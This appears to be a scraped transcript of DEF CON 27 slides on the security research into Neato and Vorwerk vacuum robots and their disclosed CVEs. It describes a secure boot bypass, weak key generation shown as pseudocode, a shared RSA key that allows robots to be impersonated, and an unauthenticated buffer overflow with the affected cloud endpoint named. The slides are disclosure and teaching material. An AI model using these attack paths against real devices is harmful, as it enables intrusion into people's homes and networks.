Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found...
Transcript of Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found...
![Page 1: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/1.jpg)
Vacuum Cleaning SecurityPinky and the Brain Edition
Jiska ClassenSecure Mobile Networking Lab - SEEMOO
Technische Universität Darmstadt, Germany
Fabian UllrichIT Security Analyst @ ERNW GmbHHeidelberg, Germany
![Page 2: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/2.jpg)
2
● A vacuum cleaning robot is in your house, has access to your Wi-Fi and knows many of your personal habits.
● Who of you owns a vacuum cleaning robot?● (Own as it's YOUR robot, neither your neighbor's nor someone's on the Internet!)
Motivation
![Page 3: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/3.jpg)
3
● A vacuum cleaning robot is in your house, has access to your Wi-Fi and knows many of your personal habits.
● Who of you owns a vacuum cleaning robot?● Neato is one of the top vacuum cleaning robot models in the US.● In Germany, Vorwerk has been selling vacuum cleaners forever (founded 1883).
Their top model, a robot, is a rebranded Neato.● Vorwerk won the test comparisons in Germany with their VR300/VR200.
Motivation
![Page 4: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/4.jpg)
4
● Robots were harmed during our experiments! (Sorry for that…)● No customer data was leaked.● Neato was informed and fixed all issues in time.
Responsible Disclosure
![Page 5: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/5.jpg)
5
Infrastructure & Security Features
UI & USB console
![Page 6: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/6.jpg)
6
Infrastructure & Security Features
UI & USB console
Manual robot commands
![Page 7: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/7.jpg)
7
Infrastructure & Security Features
Beehive
UI & USB console
Manual robot commands
Setup only
Account information
![Page 8: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/8.jpg)
8
Infrastructure & Security Features
Nucleo
Beehive
UI & USB console
Manual robot commands
Setup only
??
Robot commands / status
Account information
Robot commands, status responses
![Page 9: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/9.jpg)
9
Infrastructure & Security Features
Nucleo
Beehive✔ HTTPS✔ RSA key (robot↔cloud)
??
✔ HTTPS
✔ Secure boot✔ Encrypted logs✔ Signed firmware updates
✔ HTTPS
✔ RSA key (robot↔cloud)
✔ Secret key (robot↔user)
✔ HTTPS
✔ Secret key (robot↔user)
✔ Secret key (robot↔user)
![Page 10: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/10.jpg)
10
● With all these security features, what could possibly go wrong?
Contributions
![Page 11: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/11.jpg)
11
● With all these security features, what could possibly go wrong?
● We bypass secure boot on a vacuum cleaning robot to extract its memory.
● Our key findings are…○ … key findings!○ And a QNX side quest.
● We also gained unauthenticated RCE on robots over the cloud.
Contributions
![Page 12: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/12.jpg)
12
● Custom AM335x chip (guessed by size factor).● QNX 6.5 image from Foundry27 is bootable but crashes.
● Get QNX SDP, modify image, skip hardware initialization,reboot Neato system into custom image for cold boot attack,print all RAM to the serial port.
● Watchdog started by Pinky, ● Cleaning logic binary started by Brain.
Secure Boot Bypass
Jiska found this, got assigned CVE-2018-20785, fixed in Neato BotVac Connected D7 4.4.0-72 in December 2018 and for Vorwerk somewhen after January 2019.
![Page 13: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/13.jpg)
13
Secret Key● Generated when associating a robot with a user account. ● Known by: robot, app and cloud components.● Individual key for each robot/user account relation!
Used for authenticating commands to robot.
Keys and their Purpose (1)
https://developers.neatorobotics.com/
![Page 14: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/14.jpg)
14
Secret Key● Generated when associating a robot with a user account. ● Known by: robot, app and cloud components.● Individual key for each robot/user account relation!
Used for authenticating commands to robot.
Keys and their Purpose (1)
Header = Authorization: NEATOAPP [signature]
1 string_to_sign = serial + date + message_body2 signature = HMAC_SHA256(secret_key, string_to_sign)
https://developers.neatorobotics.com/
![Page 15: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/15.jpg)
15
RSA Key● Robots have to initially send the secret key
○ Has to be authenticated.● Secret key not that secret
○ Several third parties know it.○ Cannot be used to authenticate the robot in the cloud.
RSA Key used to authenticate robot to cloud.
Keys and their Purpose (2)
![Page 16: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/16.jpg)
16
RSA Key● Robots have to initially send the secret key
○ Has to be authenticated.● Secret key not that secret
○ Several third parties know it.○ Cannot be used to authenticate the robot in the cloud.
RSA Key used to authenticate robot to cloud.
Keys and their Purpose (2)
Header = Authorization: NEATOBOT [serial]:[signature]
1 string_to_sign = serial + http_method + URI + date + body
2 signature = sign_rsa_sha256(string_to_sign, rsa_private_key)
![Page 17: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/17.jpg)
17
Secret Key Entropy Reduction
Fabian found and analyzed this beautiful piece of code! Got assigned CVE-2018-19441.
1 rnd = rand();23 time_shift[0:3] = time_now;4 time_shift[4:6] = 0;5 time_shift[7] = 16;6 time_shift[8] = rnd + rnd / 0xFFFF;7 time_shift[9] = entropy_reducing_math(rnd + rnd / 0xFFFF);8 time_shift[10:15] = robot_MAC;
![Page 18: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/18.jpg)
18
Secret Key Entropy Reduction
Fabian found and analyzed this beautiful piece of code! Got assigned CVE-2018-19441.
1 rnd = rand();23 time_shift[0:3] = time_now;4 time_shift[4:6] = 0;5 time_shift[7] = 16;6 time_shift[8] = rnd + rnd / 0xFFFF;7 time_shift[9] = entropy_reducing_math(rnd + rnd / 0xFFFF);8 time_shift[10:15] = robot_MAC;
![Page 19: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/19.jpg)
19
● Entropy relies on time of robot linkage.○ One year = 25 bit○ One hour = 12 bit
● There are multiple offline attack scenarios.
Secret Key Entropy Reduction
Fabian found and analyzed this beautiful piece of code! Got assigned CVE-2018-19441.
1 rnd = rand();23 time_shift[0:3] = time_now;4 time_shift[4:6] = 0;5 time_shift[7] = 16;6 time_shift[8] = rnd + rnd / 0xFFFF;7 time_shift[9] = entropy_reducing_math(rnd + rnd / 0xFFFF);8 time_shift[10:15] = robot_MAC;
![Page 20: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/20.jpg)
20
● Encrypted RSA keys in /var/keys.● vendorPrivateKeyProduction sounds promising!● Let’s do some string de-obfuscation!
RSA Keys for Robot Authenticity (1)
![Page 21: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/21.jpg)
21
● Encrypted RSA keys in /var/keys.● vendorPrivateKeyProduction sounds promising!● Let’s do some string de-obfuscation!
RSA Keys for Robot Authenticity (1)
● RSA key is the same for all robots.
![Page 22: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/22.jpg)
22
● Encrypted RSA keys in /var/keys.● vendorPrivateKeyProduction sounds promising!● Let’s do some string de-obfuscation!
RSA Keys for Robot Authenticity (1)
● RSA key is the same for all robots.
![Page 23: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/23.jpg)
23
● We are able to impersonate arbitrary robots.○ Allows for multiple other attacks.○ For example: Leak victim’s smartphone IP
RSA Keys for Robot Authenticity (2)
Nucleo
Robo
t loc
ation
?
![Page 24: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/24.jpg)
24
● We are able to impersonate arbitrary robots.○ Allows for multiple other attacks.○ For example: Leak victim’s smartphone IP
RSA Keys for Robot Authenticity (2)
Nucleo
Does no longer get requests
Robo
t loc
ation
?
Robot location?
![Page 25: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/25.jpg)
25
● We are able to impersonate arbitrary robots.○ Allows for multiple other attacks.○ For example: Leak victim’s smartphone IP
RSA Keys for Robot Authenticity (2)
Nucleo
Does no longer get requests
Robo
t loc
ation
?
Robot location?
Robot location is 1.3.3.7:42
![Page 26: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/26.jpg)
26
● We are able to impersonate arbitrary robots.○ Allows for multiple other attacks.○ For example: Leak victim’s smartphone IP.
RSA Keys for Robot Authenticity (2)
Nucleo
Does no longer get requests
Robo
t loc
ation
?
Robot location?
Robot location is 1.3.3.7:42
1.3.
3.7:
42
![Page 27: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/27.jpg)
27
● We are able to impersonate arbitrary robots.○ Allows for multiple other attacks.○ For example: Leak victim’s smartphone IP
RSA Keys for Robot Authenticity (2)
Nucleo
Does no longer get requests
Manual drive…1.3.3.7:42 Ro
bot l
ocat
ion?
Robot location?
Robot location is 1.3.3.7:42
1.3.
3.7:
42
![Page 28: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/28.jpg)
28
● Power plants, cars, and other critical applications run on QNX < 6.6. Today.● The current version is 7.x, but many vendors might not have updated it so far.● Default settings are no ASLR, no DEP :).● The robots run on QNX 6.5 … Side quest: How secure is it?
We ❤ QNX < 6.6
Fabian and Johannes created a PoC for privilege escalation and got assigned CVE-2019-8998. http://support.blackberry.com/kb/articleDetail?articleNumber=000057178
![Page 29: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/29.jpg)
29
● Power plants, cars, and other critical applications run on QNX < 6.6. Today.● The current version is 7.x, but many vendors might not have updated it so far.● Default settings are no ASLR, no DEP :).● The robots run on QNX 6.5 … Side quest: How secure is it?
We ❤ QNX < 6.6
Fabian and Johannes created a PoC for privilege escalation and got assigned CVE-2019-8998. http://support.blackberry.com/kb/articleDetail?articleNumber=000057178
![Page 30: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/30.jpg)
30
● Buffer overflow in Nucleo cloud connection daemon.
Unauthenticated RCE
Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177), Johannes did further analysis and implemented a PoC (CVE-2018-19442).
Nucleo
/bin/astro /bin/robot
Buffer Overflow
![Page 31: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/31.jpg)
31
● Buffer overflow in Nucleo cloud connection daemon.
● Can be triggered with requests to https://nucleo.neatocloud.com:4443/vendors/neato/robots/[robot_serial]/messages.
● The overflow is within parsing the authentication header, which means that we found an unauthenticated RCE!
● All services run as root.
● Fix: Authentication headers are validated on Nucleo.
Unauthenticated RCE
Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177), Johannes did further analysis and implemented a PoC (CVE-2018-19442).
Nucleo
/bin/astro /bin/robot
Buffer Overflow
![Page 32: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/32.jpg)
32
● IoT product at home? Keep it offline!
● As a customer:○ Update your robot.○ Hide your robot’s serial number!
Security Implications (1)
![Page 33: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/33.jpg)
33
● Connected ecosystem developers:○ Using RSA, RNG, hashing, secure boot, encrypted logs, signed firmware updates
sounds good...○ Review cryptographic key components and root of trust assumptions.○ Dissecting one of your products should not compromise security of the other
products, i.e., similar keys.○ Test your security relevant code in practice
to uncover issues like the static secret key“random” function—check entropy beforehashing.
Security Implications (2)
![Page 34: Pinky and the Brain Edition - DEF CON CON 27/DEF CON 27...daemon. Unauthenticated RCE Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177),](https://reader033.fdocuments.us/reader033/viewer/2022060413/5f1205fd23dc9532a51d10ab/html5/thumbnails/34.jpg)
34
Q&A